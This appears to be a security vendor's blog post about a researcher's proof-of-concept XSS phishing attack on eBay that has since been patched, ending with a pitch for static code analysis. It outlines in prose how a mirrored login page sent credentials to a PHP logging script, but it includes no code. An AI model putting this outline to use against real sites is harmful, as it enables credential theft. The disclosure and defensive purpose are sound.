Online e-commerce has become the rage. Millions of people worldwide are doing their shopping on the various online platforms. But even enormous e-commerce platforms like eBay are not immune to cybercrime, as security researcher MLT demonstrated recently. The culprit this time was Cross Site Scripting (XSS), a common application layer vulnerability that obviously was not detected/remediated during development.
What was stolen?
The way it looks right now, nothing was stolen. Security researcher MLT demonstrated recently on his blog how easily it is possible to execute phishing attacks on eBay. Luckily for eBay and its 159 million active users, this vulnerability was not used maliciously for real attacks. As far as we know, the ethical hacker has only exploited this flaw as a POC.
How was the POC attack on eBay executed?
The method used to perform this POC was Cross Site Scripting (XSS). XSS is probably at the top of the list when looking at vulnerability exploits used in the wild. The idea is very simple. Make the users think that they are looking at the regular login page while they are actually punching in their credentials in a form that is injected by a third party. All data is collected on a remote command and control server.
Here is how the attack was performed. MLT did the following things:
1 – Used WebHTTrack, dedicated mirroring software, to duplicate the eBay interface.
2 – Changed the login form inputs for the page and directed them to his PHP script.
3 – Created a malicious PHP script (payload) to execute the attack properly.
4 – Made sure all permissions were properly setup and tested everything locally.
Once the victim entered his credentials on the phishing page, a GET request was made to log.php on MLT’s server and the inputted details were written to log.txt in plaintext format.
MLT’s eBay hacking POC. Courtesy: www.ret2libc.wordpress.com
eBay initially took their time to process the POC that was send to them by MLT in December 2015. But the issue was eventually patched and eBay can’t be hacked this way anymore. As mentioned earlier in this post, there have been no known live attacks exploiting this vulnerability however it is crucial for vendors to address such issues as early as possible and avoid potential attacks on their users and platforms.
XSS is an application layer vulnerability that can be eradicated during the development process. This can ideally be done by integrating security into the developer’s environment and automating the whole process. In other words, the organization should ideally create a secure Software Development Life Cycle (sSDLC), where security issues are treated like QA bugs and eliminated on-the-go.
Besides the obvious benefit of avoiding post-release embarrassments (best case) and hacking incidents (worst case), implementing automated solutions such as Static Code Analysis (SCA) allow improved ROI, better security awareness amongst developers and lesser inter-department (Security staff, development teams, management) friction within the organization.
- Click here for 5 key benefits of Source Code Analysis (SCA)
- Click here for CheckMarx CxSAST Static Code Analysis solution